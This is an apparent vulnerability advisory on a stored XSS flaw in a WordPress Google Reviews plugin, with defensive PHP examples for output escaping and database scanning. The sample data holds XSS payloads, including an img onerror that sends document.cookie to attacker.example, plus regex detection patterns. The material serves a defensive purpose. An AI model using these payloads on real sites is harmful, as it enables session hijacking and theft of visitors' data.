CVE-2025-12499

Rich · Rich Shortcodes for Google Reviews (WordPress Plugin)

A high-severity vulnerability exists in the "Rich Shortcodes for Google Reviews" WordPress plugin, which could allow an attacker to inject malicious code into a website.

Executive summary

The "Rich Shortcodes for Google Reviews" WordPress plugin contains a high-severity stored cross-site scripting (XSS) flaw. An attacker posts a specially crafted Google Review for the business; when the plugin fetches that review and displays it on the site, the embedded script executes in the browsers of visitors. This can lead to theft of user data, session hijacking, or redirection to malicious websites, posing a significant risk to the organization's reputation and its users' security.

Vulnerability

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw. The plugin does not sanitize or escape the content of Google Reviews before storing them and rendering them on the WordPress site. An attacker exploits this by writing a Google Review for the business whose text contains HTML that carries JavaScript, such as a <script> tag or an event-handler attribute. The attacker needs no account on the WordPress site: the payload enters through Google's review platform, which the plugin treats as trusted input. When the plugin fetches and renders the review, the markup is stored in the site's database and executed in the browser of every user who views the page, including logged-in administrators.
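The following is an added illustration, not code from the plugin or the vendor: a hypothetical review-rendering function with the defect described above (untrusted review fields concatenated straight into HTML), beside a hardened version that escapes each field for the context it is written into. The review array, the function names and the attacker hostname are all assumptions made for the example; esc_html() is WordPress's real escaping function, with a plain-PHP fallback so the file also runs from the command line.

```php
<?php
// Added illustration (not the plugin's code): a review-rendering shortcode
// callback with a stored-XSS sink, and the same output made safe.
// The review array, function names and attacker host are hypothetical.

// Constructed sample: a review as a plugin might receive it from Google.
// The attacker controls author_name and text simply by writing the review.
$review = [
    'author_name' => 'Mallory',
    'rating'      => 5,
    'text'        => 'Great service! <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// VULNERABLE: untrusted strings are concatenated straight into HTML, so the
// <img onerror=...> payload is emitted verbatim and runs in every visitor's browser.
function render_review_vulnerable( array $review ) {
    return '<div class="review">'
        . '<span class="author">' . $review['author_name'] . '</span>'
        . '<span class="rating">' . $review['rating'] . '</span>'
        . '<p class="text">' . $review['text'] . '</p>'
        . '</div>';
}

// esc_html() is WordPress's own HTML-text escaping function. The fallback
// exists only so this file also runs outside WordPress.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

// HARDENED: every untrusted string is escaped for the HTML-text context it
// lands in, and the numeric field is cast so it cannot carry markup at all.
// If limited formatting (bold, links) must survive, pass the text through
// wp_kses_post() instead of esc_html(); never emit it raw.
function render_review_hardened( array $review ) {
    return '<div class="review">'
        . '<span class="author">' . esc_html( $review['author_name'] ) . '</span>'
        . '<span class="rating">' . (int) $review['rating'] . '</span>'
        . '<p class="text">' . esc_html( $review['text'] ) . '</p>'
        . '</div>';
}

// Small self-check that throws instead of relying on assert(), which is
// compiled out when zend.assertions is -1.
function check( bool $ok, string $what ) {
    if ( ! $ok ) {
        throw new RuntimeException( "check failed: $what" );
    }
}

$vulnerable_html = render_review_vulnerable( $review );
$hardened_html   = render_review_hardened( $review );

// The payload leaves the vulnerable path as a live tag ...
check( strpos( $vulnerable_html, '<img src=x onerror=' ) !== false, 'vulnerable path emits live tag' );
// ... and leaves the hardened path as inert text: "<" became "&lt;", the
// quote around the handler became "&quot;", so the browser renders it as text.
check( strpos( $hardened_html, '<img' ) === false, 'hardened path emits no live img tag' );
check( strpos( $hardened_html, '&lt;img src=x onerror=&quot;' ) !== false, 'hardened path escaped the payload' );

echo "vulnerable: ", $vulnerable_html, PHP_EOL;
echo "hardened:   ", $hardened_html, PHP_EOL;
```

The design point is that escaping happens at output, per context: esc_html() for text nodes, a cast for the numeric rating, and, if any HTML must be preserved, an allow-list filter such as wp_kses_post() rather than a deny-list of tag names. Sanitizing only at fetch time is not enough on its own, because any other code path that later echoes the stored field reintroduces the sink.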

Business impact

This vulnerability is rated High severity with a CVSS score of 7.2. Consequences of successful exploitation include, but are not limited to, website defacement, theft of sensitive user information (such as session cookies or credentials entered into forms on the compromised page), redirection of users to phishing or malware sites, and damage to the organization's brand and reputation. If an administrator views the affected page and the injected script hijacks that session or performs actions with the administrator's privileges, the attacker can gain full control of the WordPress site.

Remediation

Immediate Action: Apply the vendor's security update for the plugin as soon as it is available. Patching fixes how reviews are rendered but does not remove a payload that has already been fetched and stored, so after updating, inspect the plugin's stored review data for injected markup and purge or refresh it. Also review web server access logs and audit trails for suspicious activity related to the plugin's functionality, which may indicate prior exploitation.

Proactive Monitoring: Implement monitoring to detect potential exploitation. Security teams should look for script tags (<script>) and HTML event-handler attributes (onerror, onload, and similar on* attributes) in the database tables or options where the plugin stores fetched reviews. Note that the injected script runs in visitors' browsers, not on the web server, so server-side egress monitoring will not see its connections; a Content Security Policy on the affected pages with a reporting endpoint (report-to or report-uri) is the practical way to observe injected script attempting to load from or connect to unknown domains.
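As an added example of the database check described above (not a tool shipped with the plugin or the vendor), the script below scans review records for the indicators named in the text and generalizes them slightly: any on*= event-handler attribute rather than only onerror and onload, javascript: URLs, and embedding elements such as <svg> or <iframe>. The rows, field names and the attacker hostname are constructed for the example; where the plugin actually caches its reviews is not specified here, so the constructed array stands in for whatever $wpdb query would read that table or option.

```php
<?php
// Added detection helper, not part of the plugin: scans stored review text for
// stored-XSS indicators and returns the rows worth triaging. Sample rows and
// field names are constructed for this example; the attacker host is hypothetical.

// Indicator patterns. A hit is a reason to look, not proof of compromise:
// genuine reviews rarely contain tags or "on...=" at all, so the queue is short.
const REVIEW_XSS_INDICATORS = [
    'script tag'        => '/<\s*script\b/i',
    'event handler'     => '/[\s\/"\']on[a-z]+\s*=/i',
    'javascript: URL'   => '/javascript\s*:/i',
    'embedding element' => '/<\s*(iframe|svg|object|embed|math)\b/i',
];

// Return every indicator label that fires on one review string. The check runs
// on the raw text and on a once-decoded copy, so a payload stored entity-encoded
// (&lt;script&gt;) is still surfaced in case some renderer decodes it before output.
function review_xss_indicators( string $text ): array {
    $hits     = [];
    $variants = [ $text, html_entity_decode( $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' ) ];
    foreach ( REVIEW_XSS_INDICATORS as $label => $pattern ) {
        foreach ( $variants as $candidate ) {
            if ( preg_match( $pattern, $candidate ) ) {
                $hits[] = $label;
                break;
            }
        }
    }
    return $hits;
}

// Scan a list of review rows (author and body are both attacker-controlled)
// and return only the suspicious ones together with the indicators that fired.
function scan_reviews( array $rows ): array {
    $flagged = [];
    foreach ( $rows as $row ) {
        $hits = array_unique( array_merge(
            review_xss_indicators( (string) $row['author_name'] ),
            review_xss_indicators( (string) $row['text'] )
        ) );
        if ( $hits ) {
            $flagged[] = [ 'id' => $row['id'], 'indicators' => array_values( $hits ) ];
        }
    }
    return $flagged;
}

// Constructed sample rows standing in for the plugin's cached review data.
// Rows 1 and 2 are benign (row 2 deliberately contains a bare "<" to show that
// angle brackets alone do not fire); rows 3 to 5 carry payloads, the last one
// entity-encoded. In a real run replace this array with a $wpdb->get_results()
// query against wherever the plugin stores reviews (check the plugin source),
// and execute the file with `wp eval-file scan.php`.
$sample_rows = [
    [ 'id' => 1, 'author_name' => 'Alice',   'text' => 'Friendly staff, quick turnaround.' ],
    [ 'id' => 2, 'author_name' => 'Bob',     'text' => 'Rated 4 < 5 because of parking.' ],
    [ 'id' => 3, 'author_name' => 'Mallory', 'text' => 'Nice <img src=x onerror=alert(document.domain)>' ],
    [ 'id' => 4, 'author_name' => '<script>fetch("//attacker.example")</script>', 'text' => 'ok' ],
    [ 'id' => 5, 'author_name' => 'Eve',     'text' => '&lt;svg onload=alert(1)&gt; hidden by encoding' ],
];

foreach ( scan_reviews( $sample_rows ) as $f ) {
    printf( "review %d: %s\n", $f['id'], implode( ', ', $f['indicators'] ) );
}
```

Run it on the real stored data after patching as well as before: the fix changes rendering, not the rows already cached, so a payload that was fetched while the site was vulnerable stays in the database until the cache is purged or refreshed. Treat the output as a triage list and inspect each flagged row by hand; the regexes are tuned for low false positives on review prose, not for completeness against every browser parsing quirk.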

Compensating Controls: If immediate patching is not feasible, disable the plugin temporarily to remove the attack vector. Be aware that a Web Application Firewall (WAF) is of limited use here: the payload does not arrive in an attacker's request to the site but in the plugin's own fetch of review data from Google, so WAF rules that inspect inbound requests never see it. A WAF that inspects response bodies for script injection, or a restrictive Content Security Policy on the pages that display reviews, provides a more relevant additional layer of defense.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the High severity (CVSS 7.2) of this vulnerability and the low barrier to exploitation (the attacker needs only to post a Google Review; no account on the target site is required), immediate action is required. Organizations should prioritize applying the vendor-supplied patch to all websites using the "Rich Shortcodes for Google Reviews" plugin. Although this CVE is not currently listed in the CISA KEV catalog, its potential impact on website integrity and user security warrants treating it with the highest urgency to prevent compromise.